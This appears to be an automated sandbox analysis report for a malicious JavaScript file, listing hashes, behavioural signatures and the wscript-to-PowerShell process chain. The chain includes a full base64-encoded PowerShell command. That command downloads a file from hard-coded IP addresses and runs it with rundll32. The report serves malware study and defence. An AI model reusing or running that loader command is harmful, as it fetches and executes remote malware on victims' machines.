Analysis
-
max time kernel
82s -
max time network
34s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
05/05/2023, 13:46
Static task
static1
Behavioral task
behavioral1
Sample
Vnakqhgg.js
Resource
win7-20230220-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
Vnakqhgg.js
Resource
win10v2004-20230220-en
6 signatures
150 seconds
General
-
Target
Vnakqhgg.js
-
Size
51KB
-
MD5
d0bf291627ee585bce6b79b0e02be8e7
-
SHA1
952097b41357ee4e3aed74823a0d3c20bdd45191
-
SHA256
8b20afb8cb70beeeca2edc91794c4065c7b553e17eb6218fcec246452facb208
-
SHA512
38548e5ce504377fe0a42cfefdc034ce8299d46b4273478be06b67a0376917ed5dc2a7e94cbc62e3cdb37b871b3a7a0a3ba74641bb6e3f96d3a7082880dfc3ba
-
SSDEEP
768:2ySwBrvGSnhvVUgUBjBLGSCOkhyDu7mSm/jAcTfGPF+82H0VtjJekxz664ahBKpv:2fwLx+ileEiZjClQ
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1680 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1680 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1536 wrote to memory of 1260 1536 wscript.exe 28 PID 1536 wrote to memory of 1260 1536 wscript.exe 28 PID 1536 wrote to memory of 1260 1536 wscript.exe 28 PID 1260 wrote to memory of 1680 1260 wscript.exe 29 PID 1260 wrote to memory of 1680 1260 wscript.exe 29 PID 1260 wrote to memory of 1680 1260 wscript.exe 29
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Vnakqhgg.js1⤵
- Suspicious use of WriteProcessMemory
PID:1536 -
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\Vnakqhgg.js" levulosuria overmilitaristicallyTelluretted2⤵
- Suspicious use of WriteProcessMemory
PID:1260 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANwAyADsAJAByAGEAZgB0AGkAbgBnACAAPQAgACgAIgBoAHQAdABwADoALwAvADEAOQAyAC4AMQAyADEALgAxADYALgAyADMAMwAvAFgAVABMAFkAMQBYAFEALwBYAEwASgBYAGUAQwAwACwAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEAMgAxAC4AMQA2AC4AMgAzADIALwB3ADAARwAvAG4AZQA0AFYAZQBGAFQAeAB1AFEALABoAHQAdABwADoALwAvADEANQAxAC4AMgAzADYALgAxADQALgAxADIANwAvAEYAUQBvAEIAQgBRAC8AcQBuAEkAcABNADYAQwBaAEQAdQB2ACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAbgBzAGUAYwB0AGEAcgBpAHUAbQBzAFMAdAB1AG0AcABhAGcAZQBzACAAaQBuACAAJAByAGEAZgB0AGkAbgBnACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABJAG4AcwBlAGMAdABhAHIAaQB1AG0AcwBTAHQAdQBtAHAAYQBnAGUAcwAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwAgADEANQAgAC0ATwAgACQAZQBuAHYAOgBUAEUATQBQAFwAYwBpAG4AZQBtAGEAdABvAGcAcgBhAHAAaAB5AEQAbwB3AHMAZQByAHMALgBVAG4AbwByAGQAYQBpAG4AZQBkAEQAZQBzAHMAdQBzADsAIABpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQARQBNAFAAXABjAGkAbgBlAG0AYQB0AG8AZwByAGEAcABoAHkARABvAHcAcwBlAHIAcwAuAFUAbgBvAHIAZABhAGkAbgBlAGQARABlAHMAcwB1AHMAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADYAOQAwADAAMAApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARgBRAEEAUgBRAEIATgBBAEYAQQBBAFgAQQBCAGoAQQBHAGsAQQBiAGcAQgBsAEEARwAwAEEAWQBRAEIAMABBAEcAOABBAFoAdwBCAHkAQQBHAEUAQQBjAEEAQgBvAEEASABrAEEAUgBBAEIAdgBBAEgAYwBBAGMAdwBCAGwAQQBIAEkAQQBjAHcAQQB1AEEARgBVAEEAYgBnAEIAdgBBAEgASQBBAFoAQQBCAGgAQQBHAGsAQQBiAGcAQgBsAEEARwBRAEEAUgBBAEIAbABBAEgATQBBAGMAdwBCADEAQQBIAE0AQQBMAEEAQgBVAEEARwBrAEEAYgBRAEIAbABBAEQAcwBBACIAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADsAfQB9AA=="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1680
-
-